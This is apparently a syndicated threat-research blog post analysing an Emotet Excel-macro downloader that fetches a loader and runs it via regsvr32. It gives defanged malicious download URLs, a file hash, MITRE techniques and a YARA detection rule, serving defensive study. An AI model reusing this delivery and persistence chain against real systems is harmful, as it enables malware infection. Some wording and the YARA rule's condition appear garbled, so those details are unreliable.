Emotet Downloader document uses Regsvr32 for execution


This article investigates a recent Emotet intrusion and details how the final Emotet payload is installed on the system. The main observations are as follows:

  • Hidden Excel macros used to download and run the Emotet loader.
  • Emotet loader run using regsvr32.exe.
  • Embedded encrypted Emotet payload in the .rsrc section of the loader.
  • Windows service used for Emotet payload persistence.
  • Emotet continues to evolve delivery techniques and obfuscation to reduce detection.


Emotet is a Windows-based malware loader operated by cyber crime group TA542 (1), also called Mummy Spider (2). First discovered in mid-2014, Emotet, initially designed as a banking Trojan, was later developed into a modular malware platform capable of performing various functions such as loading other malware , information theft and spambot features (1). Emotet is mainly distributed through phishing campaigns (1). In early 2021, North American and European law enforcement disrupted Emotet’s infrastructure, resulting in an outage of Emotet’s activity (3), but Emotet resumed operations in mid-November 2021 (4). Emotet has been observed removing other malware families such as Qakbot (5) and Cobalt Strike (6). Emotet infections are high risk, having led to ransomware deployments in the past (seven).

AppSec/API Security 2022

EclecticIQ analysts observed the distribution of Emotet throughout 2022. The bar chart below highlights the number of Emotet files and network indicators observed in EclecticIQ’s internal dataset during the first half of 2022.


Figure 1.1: Bar chart of the number of Emotet-specific indicators seen each month in the first half of 2022

Step One: Initial Delivery

Microsoft Office XLS document runs a hidden Excel 4.0 macro when activated

The first stage of an attack likely starts with a spam email providing a Microsoft Office XLS document as an attachment. The XLS document uses hidden Excel macros. When opened, the document asks the user to activate the content, when activated, the macro runs.


Figure 2.1: Screenshot of an Excel document prompting the user to “Enable content”

The actor uses various methods to obfuscate the Excel macro, which makes it more difficult to statically analyze the file. The document uses several password-protected spreadsheets, these spreadsheets containing ‘CHAR’ formulas returning a character of text. The characters are scattered on the sheets in different cells (as shown in Figure 2.2) and are written in white color font to make the sheets appear blank.


Figure 2.2: Characters scattered around Excel cells

The macro downloads and runs Emotet Loader

When run with macros enabled, the document uses the ‘Auto_Open’ method to execute the formula shown in Figure 2.3. This formula de-obscures the functionality of the macro by revealing four CALL and EXEC functions. The macro will then try to download the Emotet loader using the URLDownloadToFileA function and save it to the current parent directory with the file extension ‘.ocx’ (active control). It then tries to run the downloaded Emotet loader using regsvr32.exe with the /S parameter. The program makes four attempts to download and run the loader, although the initial attempts are successful, with the macro then terminating.


Figure 2.3: Unobfuscated malicious Excel formulas

Step Two: Emoticon Loader

Emotet Loader decrypts and loads Emotet payload

The Emotet Loader is a 64-bit DLL, which contains the encrypted Emotet payload as an embedded resource, under the name “7732”.


Figure 3.1: Encrypted Emotet payload in PE .rsrc section

The Emotet loader will load the encrypted payload into memory using the VirtualAlloc function to allocate memory. The loader passes the value 0x1E34 (decimal 7732) which is the name of the encrypted payload resource as the second parameter to the LoadResource function.

6-left6-rightFigure 3.2: Payload encrypted in hex editor (top) and memory-mapped (bottom)

The Emotet payload is decrypted and written to the allocated memory area. The payload is a 64-bit DLL. The file is moved from %HOMEPATH%soci2.ocx to qbknpcdiwaui.dll. Persistence is created using the Windows service; the created service runs the Emotet payload using regsvr32.exe.

7-1Figure 3.3: Emotet payload decrypted in memory


Once the Emotet payload is fully installed, it allows the malware operator to remotely access the victim’s system. This remote access allows other Emotet modules or other malware families to be loaded onto the system. The MITER ATT&CK classification, indicators and YARA rule are available below and can help security teams track, monitor and detect Emotet infections.

  • T1566.001: Phishing attachment
  • T1204.002: User Execution: Malicious File
  • T1543.003: Create or modify a system process: Windows service
  • T1027: Obfuscated files or information
  • T1140: Deobfuscate/decode files or information
  • T1218.010: Running system binary proxy: Regsvr32
  • T1071.001: Application Layer Protocol: Web Protocols

Excel document:

  • 625121dba58742d70d59010af2a452649101cc0d6a3c956352e0c19bf31c7fc3

Download URL:

  • https://cointrade[.]world/recipes/0LjXVwpQrhw/
  • http://www.garantihaliyikama[.]com/wp-admin/jp64lssPHEe2ii/
  • http://haircutbar[.]com/cgi-bin/BC3WAQ8zJY4ALXA4/
  • http://airhobi[.]com/system/WLvH1ygkOYQO/
YARA rule:
rule emotet_xls_downloader{
identifier = “3B7stbUhJvOTZBIt8VYWJb”
edition = “1.0”
first_imported = “2022-07-21”
last_modified = “2022-07-21”
status = “RELEASED”
source = “ECLECTICIQ”
author=”EclecticIQ Threat Research Team”
description = “Yara rule to track Emotet Excel downloader documents.”
category = “MALWARE”
malware = “EMOTET”
mitre_att = “S0367”
report = “Emotet Downloader document uses Regsvr32 for execution”
sha256 = “625121dba58742d70d59010af2a452649101cc0d6a3c956352e0c19bf31c7fc3”

$ocx = “.ocx”
$h1 = {6F 6E 22 2C 22 55 52 4C 44 6F 77 6E 6C 6F 61 64 54 6F 46 69 6C} // on “,” URLDownloadToFil
$h2 = {2C 30 2C 22 68 74 74 70} // ,0,”http
$h3 = {53 79 73 74 65 6D 33 32 5C 41} // System32A
$h4 = {3A 5C 57 69 6E 64 6F 77 73 5C 41} //:WindowsA

uint16(0) == 0xcfd0 and file size }

About EclecticIQ Threat Research

EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Based in Amsterdam, the EclecticIQ Threat Research team is made up of experts from Europe and the United States with decades of experience in cybersecurity and intelligence in industry and government.

We would like to hear from you. Please send us your comments by writing to us at [email protected] Where Fill the EclecticIQ Audience Interest Survey to direct our research towards your priority area.


  1. https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service
  2. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/
  3. https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action
  4. https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/
  5. https://www.malware-traffic-analysis.net/2020/08/10/index.html
  6. https://isc.sans.edu/diary/Emotet+infection+with+Cobalt+Strike/28824
  7. https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/

*** This is a syndicated blog from the Security Bloggers Network of Blog EclecticIQ authored by the EclecticIQ Threat Research Team. Read the original post at: https://blog.eclecticiq.com/emotet-downloader-document-uses-regsvr32-for-execution

Source link

Comments are closed.